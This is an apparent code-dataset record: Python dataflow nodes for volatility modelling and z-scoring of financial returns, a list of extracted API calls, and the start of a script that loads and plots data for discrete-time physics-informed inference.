def set_fit_state(self, fit_state: Dict[str, Any]):
self._col = fit_state["_col"]
self._tau = fit_state["_tau"]
self._info["fit"] = fit_state["_info['fit']"]
self._out_col_prefix = fit_state["_out_col_prefix"]
def fit(self, df_in: pd.DataFrame) -> Dict[str, pd.DataFrame]:
return {"df_out": self._fit_predict_helper(df_in, fit=True)}
def predict(self, df_in: pd.DataFrame) -> Dict[str, pd.DataFrame]:
return {"df_out": self._fit_predict_helper(df_in, fit=False)}
def _fit_predict_helper(self, df_in: pd.DataFrame, fit: bool) -> pd.DataFrame:
info = collections.OrderedDict()
name = self._out_col_prefix or self._col
name = str(name)
dbg.dassert_not_in(name + "_vol", df_in.columns)
if self._learn_tau_on_fit and fit:
tau = None
else:
tau = self._tau
config = self._get_config(col=self._col, out_col_prefix=name, tau=tau)
dag = self._get_dag(df_in[[self._col]], config)
mode = "fit" if fit else "predict"
df_out = dag.run_leq_node(
"demodulate_using_vol_pred", mode, progress_bar=self._progress_bar
)["df_out"]
info[self._col] = extract_info(dag, [mode])
if self._learn_tau_on_fit and fit:
self._tau = info[self._col]["compute_smooth_moving_average"]["fit"][
"tau"
]
df_out = df_out.reindex(df_in.index)
self._set_info(mode, info)
return df_out
def _get_config(
self,
col: _COL_TYPE,
out_col_prefix: _COL_TYPE,
tau: Optional[float] = None,
) -> cconfig.Config:
"""
Generate a DAG config.
:param col: column whose volatility is to be modeled
:param tau: tau for SMA; if `None`, then to be learned
:return: a complete config to be used with `_get_dag()`
"""
config = cconfig.get_config_from_nested_dict(
{
"calculate_vol_pth_power": {
"cols": [col],
"col_rename_func": lambda x: out_col_prefix + "_vol",
"col_mode": "merge_all",
},
"compute_smooth_moving_average": {
"col": [out_col_prefix + "_vol"],
"steps_ahead": self._steps_ahead,
"tau": tau,
"col_mode": "merge_all",
"nan_mode": self._nan_mode,
},
"calculate_vol_pth_root": {
"cols": [
out_col_prefix + "_vol",
out_col_prefix + "_vol_" + str(self._steps_ahead),
out_col_prefix
+ "_vol_"
+ str(self._steps_ahead)
+ "_hat",
],
"col_mode": "replace_selected",
},
"demodulate_using_vol_pred": {
"signal_cols": [col],
"volatility_col": out_col_prefix
+ "_vol_"
+ str(self._steps_ahead)
+ "_hat",
"signal_steps_ahead": 0,
"volatility_steps_ahead": self._steps_ahead,
"col_rename_func": lambda x: out_col_prefix + "_vol_adj",
"col_mode": "replace_selected",
"nan_mode": self._nan_mode,
},
}
)
return config
def _get_dag(self, df_in: pd.DataFrame, config: cconfig.Config) -> DAG:
"""
Build a DAG from data and config.
:param df_in: data over which to run DAG
:param config: config for configuring DAG nodes
:return: ready-to-run DAG
"""
dag = DAG(mode="strict")
_LOG.debug("%s", config)
# Load `df_in`.
nid = "load_data"
node = ReadDataFromDf(nid, df_in)
tail_nid = self._append(dag, None, node)
# Raise volatility columns to pth power.
nid = "calculate_vol_pth_power"
node = ColumnTransformer(
nid,
transformer_func=lambda x: np.abs(x) ** self._p_moment,
**config[nid].to_dict(),
)
tail_nid = self._append(dag, tail_nid, node)
# Predict pth power of volatility using smooth moving average.
nid = "compute_smooth_moving_average"
node = SmaModel(nid, **config[nid].to_dict())
tail_nid = self._append(dag, tail_nid, node)
# Calculate the pth root of volatility columns.
nid = "calculate_vol_pth_root"
node = ColumnTransformer(
nid,
transformer_func=lambda x: np.abs(x) ** (1.0 / self._p_moment),
**config[nid].to_dict(),
)
tail_nid = self._append(dag, tail_nid, node)
        # Divide returns by volatility prediction.
nid = "demodulate_using_vol_pred"
node = VolatilityModulator(
nid, mode="demodulate", **config[nid].to_dict()
)
self._append(dag, tail_nid, node)
return dag
# TODO(gp): This code has several copies. Move it to the base class.
@staticmethod
def _append(dag: DAG, tail_nid: Optional[str], node: Node) -> str:
dag.add_node(node)
if tail_nid is not None:
dag.connect(tail_nid, node.nid)
return node.nid
class _MultiColVolatilityModelMixin:
def _fit_predict_volatility_model(
self, df: pd.DataFrame, fit: bool, out_col_prefix: Optional[str] = None
) -> Tuple[Dict[str, pd.DataFrame], collections.OrderedDict]:
dfs = {}
info = collections.OrderedDict()
for col in df.columns:
local_out_col_prefix = out_col_prefix or col
scvm = SingleColumnVolatilityModel(
"volatility",
steps_ahead=self._steps_ahead,
col=col,
p_moment=self._p_moment,
progress_bar=self._progress_bar,
tau=self._tau,
nan_mode=self._nan_mode,
out_col_prefix=local_out_col_prefix,
)
if fit:
df_out = scvm.fit(df[[col]])["df_out"]
info_out = scvm.get_info("fit")
self._col_fit_state[col] = scvm.get_fit_state()
else:
scvm.set_fit_state(self._col_fit_state[col])
df_out = scvm.predict(df[[col]])["df_out"]
info_out = scvm.get_info("predict")
dfs[col] = df_out
info[col] = info_out
return dfs, info
class VolatilityModel(
FitPredictNode,
ColModeMixin,
_MultiColVolatilityModelMixin,
):
"""
Fit and predict a smooth moving average volatility model.
Wraps `SmaModel` internally, handling calculation of volatility from
returns and column appends.
"""
def __init__(
self,
nid: str,
steps_ahead: int,
cols: Optional[_TO_LIST_MIXIN_TYPE] = None,
p_moment: float = 2,
progress_bar: bool = False,
tau: Optional[float] = None,
col_rename_func: Callable[[Any], Any] = lambda x: f"{x}_zscored",
col_mode: Optional[str] = None,
nan_mode: Optional[str] = None,
) -> None:
"""
Specify the data and smooth moving average (SMA) modeling parameters.
:param nid: unique node id
:param cols: name of columns to model
:param steps_ahead: as in ContinuousSkLearnModel
:param p_moment: exponent to apply to the absolute value of returns
:param tau: as in `csigna.compute_smooth_moving_average`. If `None`,
learn this parameter
:param col_rename_func: renaming function for z-scored column
:param col_mode:
- If "merge_all" (default), merge all columns from input dataframe and
transformed columns
- If "replace_selected", merge unselected columns from input dataframe
and transformed selected columns
- If "replace_all", leave only transformed selected columns
:param nan_mode: as in ContinuousSkLearnModel
"""
super().__init__(nid)
self._cols = cols
self._steps_ahead = steps_ahead
#
dbg.dassert_lte(1, p_moment)
self._p_moment = p_moment
#
self._progress_bar = progress_bar
#
dbg.dassert(tau is None or tau > 0)
self._tau = tau
self._col_rename_func = col_rename_func
self._col_mode = col_mode or "merge_all"
self._nan_mode = nan_mode
# State of the model to serialize/deserialize.
self._fit_cols: List[_COL_TYPE] = []
self._col_fit_state = {}
def fit(self, df_in: pd.DataFrame) -> Dict[str, pd.DataFrame]:
return self._fit_predict_helper(df_in, fit=True)
def predict(self, df_in: pd.DataFrame) -> Dict[str, pd.DataFrame]:
return self._fit_predict_helper(df_in, fit=False)
def get_fit_state(self) -> Dict[str, Any]:
fit_state = {
"_fit_cols": self._fit_cols,
"_col_fit_state": self._col_fit_state,
"_info['fit']": self._info["fit"],
}
return fit_state
def set_fit_state(self, fit_state: Dict[str, Any]):
self._fit_cols = fit_state["_fit_cols"]
self._col_fit_state = fit_state["_col_fit_state"]
self._info["fit"] = fit_state["_info['fit']"]
def _fit_predict_helper(self, df_in: pd.DataFrame, fit: bool):
cdu.validate_df_indices(df_in)
# Get the columns.
self._fit_cols = cdu.convert_to_list(self._cols or df_in.columns.tolist())
df = df_in[self._fit_cols]
dfs, info = self._fit_predict_volatility_model(df, fit=fit)
df_out = pd.concat(dfs.values(), axis=1)
df_out = self._apply_col_mode(
            df_in.drop(df_out.columns.intersection(df_in.columns), axis=1),
df_out,
cols=self._fit_cols,
col_mode=self._col_mode,
)
method = "fit" if fit else "predict"
self._set_info(method, info)
return {"df_out": df_out}
class MultiindexVolatilityModel(FitPredictNode, _MultiColVolatilityModelMixin):
"""
Fit and predict a smooth moving average volatility model.
Wraps SmaModel internally, handling calculation of volatility from
returns and column appends.
"""
def __init__(
self,
nid: str,
in_col_group: Tuple[_COL_TYPE],
steps_ahead: int,
p_moment: float = 2,
progress_bar: bool = False,
tau: Optional[float] = None,
nan_mode: Optional[str] = None,
) -> None:
"""
        Specify the data and SMA modeling parameters.
:param nid: unique node id
:param steps_ahead: as in ContinuousSkLearnModel
:param p_moment: exponent to apply to the absolute value of returns
:param tau: as in `csigna.compute_smooth_moving_average`. If `None`,
learn this parameter
:param nan_mode: as in ContinuousSkLearnModel
"""
super().__init__(nid)
dbg.dassert_isinstance(in_col_group, tuple)
self._in_col_group = in_col_group
self._out_col_group = in_col_group[:-1]
self._out_col_prefix = str(in_col_group[-1])
#
self._steps_ahead = steps_ahead
dbg.dassert_lte(1, p_moment)
self._p_moment = p_moment
#
self._progress_bar = progress_bar
#
self._tau = tau
self._nan_mode = nan_mode
#
self._col_fit_state = {}
def fit(self, df_in: pd.DataFrame) -> Dict[str, pd.DataFrame]:
return self._fit_predict_helper(df_in, fit=True)
def predict(self, df_in: pd.DataFrame) -> Dict[str, pd.DataFrame]:
return self._fit_predict_helper(df_in, fit=False)
def get_fit_state(self) -> Dict[str, Any]:
fit_state = {
"_col_fit_state": self._col_fit_state,
"_info['fit']": self._info["fit"],
}
return fit_state
def set_fit_state(self, fit_state: Dict[str, Any]):
self._col_fit_state = fit_state["_col_fit_state"]
self._info["fit"] = fit_state["_info['fit']"]
def _fit_predict_helper(self, df_in: pd.DataFrame, fit: bool):
cdu.validate_df_indices(df_in)
df = SeriesToDfColProcessor.preprocess(df_in, self._in_col_group)
dfs, info = self._fit_predict_volatility_model(
df, fit=fit, out_col_prefix=self._out_col_prefix
)
df_out = SeriesToDfColProcessor.postprocess(dfs, self._out_col_group)
df_out = cdu.merge_dataframes(df_in, df_out)
method = "fit" if fit else "predict"
self._set_info(method, info)
return {"df_out": df_out}
class VolatilityModulator(FitPredictNode, ColModeMixin):
"""
Modulate or demodulate signal by volatility.
Processing steps:
- shift volatility to align it with signal
- multiply/divide signal by volatility
Usage examples:
- Z-scoring
- to obtain volatility prediction, pass in returns into `SmaModel` with
a `steps_ahead` parameter
- to z-score, pass in signal, volatility prediction, `signal_steps_ahead=0`,
`volatility_steps_ahead=steps_ahead`, `mode='demodulate'`
- Undoing z-scoring
- Let's say we have
- forward volatility prediction `n` steps ahead
- prediction of forward z-scored returns `m` steps ahead. Z-scoring
for the target has been done using the volatility prediction above
- To undo z-scoring, we need to pass in the prediction of forward
z-scored returns, forward volatility prediction, `signal_steps_ahead=n`,
`volatility_steps_ahead=m`, `mode='modulate'`
"""
def __init__(
self,
nid: str,
signal_cols: _TO_LIST_MIXIN_TYPE,
volatility_col: _COL_TYPE,
signal_steps_ahead: int,
volatility_steps_ahead: int,
mode: str,
col_rename_func: Optional[Callable[[Any], Any]] = None,
col_mode: Optional[str] = None,
nan_mode: Optional[str] = None,
) -> None:
"""
:param nid: node identifier
:param signal_cols: names of columns to (de)modulate
:param volatility_col: name of volatility column
:param signal_steps_ahead: steps ahead of the signal columns. If signal
is at `t_0`, this value should be `0`. If signal is a forward
prediction of z-scored returns indexed by knowledge time, this
value should be equal to the number of steps of the prediction
:param volatility_steps_ahead: steps ahead of the volatility column. If
volatility column is an output of `SmaModel`, this corresponds to
the `steps_ahead` parameter
:param mode: "modulate" or "demodulate"
:param col_rename_func: as in `ColumnTransformer`
:param col_mode: as in `ColumnTransformer`
"""
super().__init__(nid)
self._signal_cols = cdu.convert_to_list(signal_cols)
self._volatility_col = volatility_col
dbg.dassert_lte(0, signal_steps_ahead)
self._signal_steps_ahead = signal_steps_ahead
dbg.dassert_lte(0, volatility_steps_ahead)
self._volatility_steps_ahead = volatility_steps_ahead
dbg.dassert_in(mode, ["modulate", "demodulate"])
self._mode = mode
self._col_rename_func = col_rename_func or (lambda x: x)
self._col_mode = col_mode or "replace_all"
self._nan_mode = nan_mode or "leave_unchanged"
def fit(self, df_in: pd.DataFrame) -> Dict[str, pd.DataFrame]:
df_out = self._process_signal(df_in)
info = collections.OrderedDict()
info["df_out_info"] = cdu.get_df_info_as_string(df_out)
self._set_info("fit", info)
return {"df_out": df_out}
def predict(self, df_in: pd.DataFrame) -> Dict[str, pd.DataFrame]:
df_out = self._process_signal(df_in)
info = collections.OrderedDict()
info["df_out_info"] = cdu.get_df_info_as_string(df_out)
self._set_info("predict", info)
return {"df_out": df_out}
def _process_signal(self, df_in: pd.DataFrame) -> pd.DataFrame:
"""
Modulate or demodulate signal by volatility prediction.
:param df_in: dataframe with `self._signal_cols` and
`self._volatility_col` columns
:return: adjusted signal indexed in the same way as the input signal
"""
dbg.dassert_is_subset(self._signal_cols, df_in.columns.tolist())
dbg.dassert_in(self._volatility_col, df_in.columns)
fwd_signal = df_in[self._signal_cols]
fwd_volatility = df_in[self._volatility_col]
# Shift volatility to align it with signal.
volatility_shift = self._volatility_steps_ahead - self._signal_steps_ahead
if self._nan_mode == "drop":
fwd_volatility = fwd_volatility.dropna()
elif self._nan_mode == "leave_unchanged":
pass
else:
raise ValueError(f"Unrecognized `nan_mode` {self._nan_mode}")
volatility_aligned = fwd_volatility.shift(volatility_shift)
# Adjust signal by volatility.
if self._mode == "demodulate":
adjusted_signal = fwd_signal.divide(volatility_aligned, axis=0)
elif self._mode == "modulate":
adjusted_signal = fwd_signal.multiply(volatility_aligned, axis=0)
else:
raise ValueError(f"Invalid mode=`{self._mode}`")
df_out = self._apply_col_mode(
df_in,
adjusted_signal,
cols=self._signal_cols,
col_rename_func=self._col_rename_func,
col_mode=self._col_mode,
)
return df_out
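# Minimal usage sketch of the z-scoring case from the docstring above, assuming the
# input frame carries returns in "ret_0" and a 2-step-ahead volatility forecast in
# "vol_2_hat" (both column names and the horizon are example values):
def _example_volatility_modulator_zscoring(df: pd.DataFrame) -> pd.DataFrame:
    node = VolatilityModulator(
        "zscore",
        signal_cols=["ret_0"],
        volatility_col="vol_2_hat",
        signal_steps_ahead=0,
        volatility_steps_ahead=2,
        mode="demodulate",
        col_rename_func=lambda x: f"{x}_zscored",
        col_mode="merge_all",
    )
    return node.fit(df)["df_out"]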
class VolatilityNormalizer(FitPredictNode, ColModeMixin):
def __init__(
self,
nid: str,
col: str,
target_volatility: float,
col_mode: Optional[str] = None,
) -> None:
"""
Normalize series to target annual volatility.
:param nid: node identifier
:param col: name of column to rescale
:param target_volatility: target volatility as a proportion
:param col_mode: `merge_all` or `replace_all`. If `replace_all`, return
only the rescaled column, if `merge_all`, append the rescaled
column to input dataframe
"""
super().__init__(nid)
self._col = col
self._target_volatility = target_volatility
self._col_mode = col_mode or "merge_all"
dbg.dassert_in(
self._col_mode,
["merge_all", "replace_all"],
"Invalid `col_mode`='%s'",
self._col_mode,
)
self._scale_factor: Optional[float] = None
def fit(self, df_in: pd.DataFrame) -> Dict[str, pd.DataFrame]:
dbg.dassert_in(self._col, df_in.columns)
self._scale_factor = cfinan.compute_volatility_normalization_factor(
df_in[self._col], self._target_volatility
)
rescaled_y_hat = self._scale_factor * df_in[self._col]
df_out = self._apply_col_mode(
df_in,
rescaled_y_hat.to_frame(),
cols=[self._col],
col_rename_func=lambda x: f"rescaled_{x}",
col_mode=self._col_mode,
)
# Store info.
info = collections.OrderedDict()
info["scale_factor"] = self._scale_factor
self._set_info("fit", info)
return {"df_out": df_out}
def predict(self, df_in: pd.DataFrame) -> Dict[str, pd.DataFrame]:
dbg.dassert_in(self._col, df_in.columns)
rescaled_y_hat = self._scale_factor * df_in[self._col]
df_out = self._apply_col_mode(
df_in,
rescaled_y_hat.to_frame(),
cols=[self._col],
col_rename_func=lambda x: f"rescaled_{x}",
col_mode=self._col_mode,
)
return {"df_out": df_out}
|
[
"logging.getLogger",
"helpers.dbg.dassert_in",
"core.dataflow.nodes.sources.ReadDataFromDf",
"helpers.dbg.dassert_is_not",
"core.dataflow.utils.get_x_and_forward_y_fit_df",
"core.dataflow.utils.merge_dataframes",
"core.data_adapters.transform_to_sklearn",
"core.dataflow.visitors.extract_info",
"helpers.dbg.dassert_lte",
"core.dataflow.nodes.base.SeriesToDfColProcessor.preprocess",
"core.dataflow.utils.convert_to_list",
"core.dataflow.nodes.base.SeriesToDfColProcessor.postprocess",
"core.dataflow.utils.get_df_info_as_string",
"core.dataflow.utils.validate_df_indices",
"numpy.rint",
"scipy.optimize.minimize_scalar",
"core.data_adapters.transform_from_sklearn",
"helpers.dbg.dassert",
"helpers.dbg.dassert_not_in",
"numpy.abs",
"collections.OrderedDict",
"helpers.dbg.dassert_no_duplicates",
"helpers.dbg.dassert_isinstance",
"core.finance.compute_volatility_normalization_factor",
"core.dataflow.utils.get_forward_cols",
"core.signal_processing.compute_smooth_moving_average",
"core.dataflow.core.DAG"
] |
[((755, 782), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (772, 782), False, 'import logging\n'), ((2076, 2100), 'core.dataflow.utils.convert_to_list', 'cdu.convert_to_list', (['col'], {}), '(col)\n', (2095, 2100), True, 'import core.dataflow.utils as cdu\n'), ((2191, 2280), 'helpers.dbg.dassert_lte', 'dbg.dassert_lte', (['(0)', 'self._steps_ahead', '"""Non-causal prediction attempted! Aborting..."""'], {}), "(0, self._steps_ahead,\n 'Non-causal prediction attempted! Aborting...')\n", (2206, 2280), True, 'import helpers.dbg as dbg\n'), ((2476, 2536), 'helpers.dbg.dassert_in', 'dbg.dassert_in', (['self._col_mode', "['replace_all', 'merge_all']"], {}), "(self._col_mode, ['replace_all', 'merge_all'])\n", (2490, 2536), True, 'import helpers.dbg as dbg\n'), ((3013, 3085), 'core.dataflow.utils.get_x_and_forward_y_fit_df', 'cdu.get_x_and_forward_y_fit_df', (['df_in', 'x_vars', 'y_vars', 'self._steps_ahead'], {}), '(df_in, x_vars, y_vars, self._steps_ahead)\n', (3043, 3085), True, 'import core.dataflow.utils as cdu\n'), ((3939, 3969), 'core.dataflow.utils.validate_df_indices', 'cdu.validate_df_indices', (['df_in'], {}), '(df_in)\n', (3962, 3969), True, 'import core.dataflow.utils as cdu\n'), ((4294, 4390), 'helpers.dbg.dassert_is_not', 'dbg.dassert_is_not', (['self._tau', 'None', '"""Parameter tau not found! Check if `fit` has been run."""'], {}), "(self._tau, None,\n 'Parameter tau not found! Check if `fit` has been run.')\n", (4312, 4390), True, 'import helpers.dbg as dbg\n'), ((5057, 5119), 'core.data_adapters.transform_to_sklearn', 'cdataa.transform_to_sklearn', (['df_in.loc[non_nan_idx]', 'self._col'], {}), '(df_in.loc[non_nan_idx], self._col)\n', (5084, 5119), True, 'import core.data_adapters as cdataa\n'), ((5183, 5240), 'core.dataflow.utils.get_forward_cols', 'cdu.get_forward_cols', (['df_in', 'self._col', 'self._steps_ahead'], {}), '(df_in, self._col, self._steps_ahead)\n', (5203, 5240), True, 'import core.dataflow.utils as cdu\n'), ((5438, 5507), 'core.data_adapters.transform_from_sklearn', 'cdataa.transform_from_sklearn', (['non_nan_idx', 'fwd_y_hat_vars', 'fwd_y_hat'], {}), '(non_nan_idx, fwd_y_hat_vars, fwd_y_hat)\n', (5467, 5507), True, 'import core.data_adapters as cdataa\n'), ((5710, 5751), 'helpers.dbg.dassert_no_duplicates', 'dbg.dassert_no_duplicates', (['df_out.columns'], {}), '(df_out.columns)\n', (5735, 5751), True, 'import helpers.dbg as dbg\n'), ((5945, 5970), 'collections.OrderedDict', 'collections.OrderedDict', ([], {}), '()\n', (5968, 5970), False, 'import collections\n'), ((6096, 6129), 'core.dataflow.utils.get_df_info_as_string', 'cdu.get_df_info_as_string', (['df_out'], {}), '(df_out)\n', (6121, 6129), True, 'import core.dataflow.utils as cdu\n'), ((7570, 7647), 'scipy.optimize.minimize_scalar', 'sp.optimize.minimize_scalar', (['score'], {'method': '"""bounded"""', 'bounds': '[tau_lb, tau_ub]'}), "(score, method='bounded', bounds=[tau_lb, tau_ub])\n", (7597, 7647), True, 'import scipy as sp\n'), ((8367, 8509), 'core.signal_processing.compute_smooth_moving_average', 'csigna.compute_smooth_moving_average', (['x_srs'], {'tau': 'self._tau', 'min_periods': 'min_periods', 'min_depth': 'self._min_depth', 'max_depth': 'self._max_depth'}), '(x_srs, tau=self._tau, min_periods=\n min_periods, min_depth=self._min_depth, max_depth=self._max_depth)\n', (8403, 8509), True, 'import core.signal_processing as csigna\n'), ((9142, 9170), 'helpers.dbg.dassert_lte', 'dbg.dassert_lte', (['(1)', 'p_moment'], {}), '(1, p_moment)\n', (9157, 9170), True, 
'import helpers.dbg as dbg\n'), ((10288, 10313), 'collections.OrderedDict', 'collections.OrderedDict', ([], {}), '()\n', (10311, 10313), False, 'import collections\n'), ((10396, 10444), 'helpers.dbg.dassert_not_in', 'dbg.dassert_not_in', (["(name + '_vol')", 'df_in.columns'], {}), "(name + '_vol', df_in.columns)\n", (10414, 10444), True, 'import helpers.dbg as dbg\n'), ((10891, 10916), 'core.dataflow.visitors.extract_info', 'extract_info', (['dag', '[mode]'], {}), '(dag, [mode])\n', (10903, 10916), False, 'from core.dataflow.visitors import extract_info\n'), ((13514, 13532), 'core.dataflow.core.DAG', 'DAG', ([], {'mode': '"""strict"""'}), "(mode='strict')\n", (13517, 13532), False, 'from core.dataflow.core import DAG, Node\n'), ((13631, 13657), 'core.dataflow.nodes.sources.ReadDataFromDf', 'ReadDataFromDf', (['nid', 'df_in'], {}), '(nid, df_in)\n', (13645, 13657), False, 'from core.dataflow.nodes.sources import ReadDataFromDf\n'), ((15367, 15392), 'collections.OrderedDict', 'collections.OrderedDict', ([], {}), '()\n', (15390, 15392), False, 'import collections\n'), ((18019, 18047), 'helpers.dbg.dassert_lte', 'dbg.dassert_lte', (['(1)', 'p_moment'], {}), '(1, p_moment)\n', (18034, 18047), True, 'import helpers.dbg as dbg\n'), ((18152, 18187), 'helpers.dbg.dassert', 'dbg.dassert', (['(tau is None or tau > 0)'], {}), '(tau is None or tau > 0)\n', (18163, 18187), True, 'import helpers.dbg as dbg\n'), ((19268, 19298), 'core.dataflow.utils.validate_df_indices', 'cdu.validate_df_indices', (['df_in'], {}), '(df_in)\n', (19291, 19298), True, 'import core.dataflow.utils as cdu\n'), ((20874, 20917), 'helpers.dbg.dassert_isinstance', 'dbg.dassert_isinstance', (['in_col_group', 'tuple'], {}), '(in_col_group, tuple)\n', (20896, 20917), True, 'import helpers.dbg as dbg\n'), ((21119, 21147), 'helpers.dbg.dassert_lte', 'dbg.dassert_lte', (['(1)', 'p_moment'], {}), '(1, p_moment)\n', (21134, 21147), True, 'import helpers.dbg as dbg\n'), ((22048, 22078), 'core.dataflow.utils.validate_df_indices', 'cdu.validate_df_indices', (['df_in'], {}), '(df_in)\n', (22071, 22078), True, 'import core.dataflow.utils as cdu\n'), ((22092, 22152), 'core.dataflow.nodes.base.SeriesToDfColProcessor.preprocess', 'SeriesToDfColProcessor.preprocess', (['df_in', 'self._in_col_group'], {}), '(df_in, self._in_col_group)\n', (22125, 22152), False, 'from core.dataflow.nodes.base import ColModeMixin, FitPredictNode, SeriesToDfColProcessor\n'), ((22297, 22357), 'core.dataflow.nodes.base.SeriesToDfColProcessor.postprocess', 'SeriesToDfColProcessor.postprocess', (['dfs', 'self._out_col_group'], {}), '(dfs, self._out_col_group)\n', (22331, 22357), False, 'from core.dataflow.nodes.base import ColModeMixin, FitPredictNode, SeriesToDfColProcessor\n'), ((22375, 22410), 'core.dataflow.utils.merge_dataframes', 'cdu.merge_dataframes', (['df_in', 'df_out'], {}), '(df_in, df_out)\n', (22395, 22410), True, 'import core.dataflow.utils as cdu\n'), ((24829, 24861), 'core.dataflow.utils.convert_to_list', 'cdu.convert_to_list', (['signal_cols'], {}), '(signal_cols)\n', (24848, 24861), True, 'import core.dataflow.utils as cdu\n'), ((24916, 24954), 'helpers.dbg.dassert_lte', 'dbg.dassert_lte', (['(0)', 'signal_steps_ahead'], {}), '(0, signal_steps_ahead)\n', (24931, 24954), True, 'import helpers.dbg as dbg\n'), ((25017, 25059), 'helpers.dbg.dassert_lte', 'dbg.dassert_lte', (['(0)', 'volatility_steps_ahead'], {}), '(0, volatility_steps_ahead)\n', (25032, 25059), True, 'import helpers.dbg as dbg\n'), ((25130, 25178), 'helpers.dbg.dassert_in', 'dbg.dassert_in', 
(['mode', "['modulate', 'demodulate']"], {}), "(mode, ['modulate', 'demodulate'])\n", (25144, 25178), True, 'import helpers.dbg as dbg\n'), ((25504, 25529), 'collections.OrderedDict', 'collections.OrderedDict', ([], {}), '()\n', (25527, 25529), False, 'import collections\n'), ((25560, 25593), 'core.dataflow.utils.get_df_info_as_string', 'cdu.get_df_info_as_string', (['df_out'], {}), '(df_out)\n', (25585, 25593), True, 'import core.dataflow.utils as cdu\n'), ((25796, 25821), 'collections.OrderedDict', 'collections.OrderedDict', ([], {}), '()\n', (25819, 25821), False, 'import collections\n'), ((25852, 25885), 'core.dataflow.utils.get_df_info_as_string', 'cdu.get_df_info_as_string', (['df_out'], {}), '(df_out)\n', (25877, 25885), True, 'import core.dataflow.utils as cdu\n'), ((26380, 26431), 'helpers.dbg.dassert_in', 'dbg.dassert_in', (['self._volatility_col', 'df_in.columns'], {}), '(self._volatility_col, df_in.columns)\n', (26394, 26431), True, 'import helpers.dbg as dbg\n'), ((28369, 28476), 'helpers.dbg.dassert_in', 'dbg.dassert_in', (['self._col_mode', "['merge_all', 'replace_all']", '"""Invalid `col_mode`=\'%s\'"""', 'self._col_mode'], {}), '(self._col_mode, [\'merge_all\', \'replace_all\'],\n "Invalid `col_mode`=\'%s\'", self._col_mode)\n', (28383, 28476), True, 'import helpers.dbg as dbg\n'), ((28659, 28699), 'helpers.dbg.dassert_in', 'dbg.dassert_in', (['self._col', 'df_in.columns'], {}), '(self._col, df_in.columns)\n', (28673, 28699), True, 'import helpers.dbg as dbg\n'), ((28729, 28823), 'core.finance.compute_volatility_normalization_factor', 'cfinan.compute_volatility_normalization_factor', (['df_in[self._col]', 'self._target_volatility'], {}), '(df_in[self._col], self.\n _target_volatility)\n', (28775, 28823), True, 'import core.finance as cfinan\n'), ((29170, 29195), 'collections.OrderedDict', 'collections.OrderedDict', ([], {}), '()\n', (29193, 29195), False, 'import collections\n'), ((29396, 29436), 'helpers.dbg.dassert_in', 'dbg.dassert_in', (['self._col', 'df_in.columns'], {}), '(self._col, df_in.columns)\n', (29410, 29436), True, 'import helpers.dbg as dbg\n'), ((3633, 3675), 'core.data_adapters.transform_to_sklearn', 'cdataa.transform_to_sklearn', (['df', 'self._col'], {}), '(df, self._col)\n', (3660, 3675), True, 'import core.data_adapters as cdataa\n'), ((6941, 7066), 'core.signal_processing.compute_smooth_moving_average', 'csigna.compute_smooth_moving_average', (['x_srs'], {'tau': 'tau', 'min_periods': '(0)', 'min_depth': 'self._min_depth', 'max_depth': 'self._max_depth'}), '(x_srs, tau=tau, min_periods=0,\n min_depth=self._min_depth, max_depth=self._max_depth)\n', (6977, 7066), True, 'import core.signal_processing as csigna\n'), ((8049, 8085), 'numpy.rint', 'np.rint', (['(self._min_tau_periods * tau)'], {}), '(self._min_tau_periods * tau)\n', (8056, 8085), True, 'import numpy as np\n'), ((8257, 8299), 'numpy.rint', 'np.rint', (['(self._min_tau_periods * self._tau)'], {}), '(self._min_tau_periods * self._tau)\n', (8264, 8299), True, 'import numpy as np\n'), ((13886, 13895), 'numpy.abs', 'np.abs', (['x'], {}), '(x)\n', (13892, 13895), True, 'import numpy as np\n'), ((14424, 14433), 'numpy.abs', 'np.abs', (['x'], {}), '(x)\n', (14430, 14433), True, 'import numpy as np\n')]
|
# Data processing imports
import scipy.io as io
import numpy as np
from pyDOE import lhs
# Plotting imports
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1 import make_axes_locatable
from scipy.interpolate import griddata
import matplotlib.gridspec as gridspec
def load_dataset(file):
data = io.loadmat(file)
return data['x'], data['t'], data['usol'].T
# Inference
def preprocess_data_discrete_inference(file, idx_t0, idx_t1, q = 500, N = 250, noise = 0.0):
x, t, u_exact = load_dataset(file)
X, T = np.meshgrid(x, t)
test_X = x
test_u = u_exact[idx_t1, :]
# Compute domain bounds for x
lb = test_X.min(0)
ub = test_X.max(0)
# Determine dt
dt = t[idx_t1] - t[idx_t0]
# Sampling for initial step
idx_x = np.random.choice(x.shape[0], N, replace = False)
x0 = x[idx_x,:]
u0 = u_exact[idx_t0:idx_t0+1, idx_x].T
u0 = u0 + noise*np.std(u0)*np.random.randn(u0.shape[0], u0.shape[1])
x1 = np.vstack([lb, ub])
tmp = np.float32(np.loadtxt(f'IRK_weights/Butcher_IRK{q}.txt', ndmin = 2))
IRK_weights = np.reshape(tmp[:q**2+q], (q+1,q))
return x, t, u_exact, T, lb, ub, dt, x0, u0, x1, test_X, test_u, IRK_weights
def plot_results_discrete_inference(x, t, x0, u0, u_exact, test_X, u1_pred, idx_t0, idx_t1, lb, ub):
fig = plt.figure(figsize = (10, 9.5))
ax = plt.gca()
ax.axis('off')
fig.patch.set_facecolor('white')
    ####### Row 0: u(t,x) ##################
gs0 = gridspec.GridSpec(1, 2)
gs0.update(top=1-0.06, bottom=1-1/2 + 0.1, left=0.15, right=0.85, wspace=0)
ax = plt.subplot(gs0[:, :])
h = ax.imshow(u_exact.T, interpolation='nearest', cmap='rainbow',
extent=[t.min(), t.max(), test_X.min(), test_X.max()],
origin='lower', aspect='auto')
divider = make_axes_locatable(ax)
cax = divider.append_axes("right", size="5%", pad=0.05)
fig.colorbar(h, cax=cax)
line = np.linspace(x.min(), x.max(), 2)[:,None]
ax.plot(t[idx_t0]*np.ones((2,1)), line, 'w-', linewidth = 1)
ax.plot(t[idx_t1]*np.ones((2,1)), line, 'w-', linewidth = 1)
ax.set_xlabel('$t$')
ax.set_ylabel('$x$')
ax.set_title('$u(t,x)$', fontsize = 10)
    ####### Row 1: u(t,x) slices ##################
gs1 = gridspec.GridSpec(1, 2)
gs1.update(top=1-1/2-0.05, bottom=0.15, left=0.15, right=0.85, wspace=0.5)
ax = plt.subplot(gs1[0, 0])
ax.plot(x,u_exact[idx_t0,:], 'b-', linewidth = 2)
ax.plot(x0, u0, 'rx', linewidth = 2, label = 'Data')
ax.set_xlabel('$x$')
ax.set_ylabel('$u(t,x)$')
ax.set_title('$t = %.2f$' % (t[idx_t0]), fontsize = 10)
